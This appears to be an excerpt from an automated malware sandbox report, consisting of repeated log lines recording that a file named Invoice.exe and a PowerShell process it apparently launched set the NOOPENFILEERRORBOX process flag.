Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
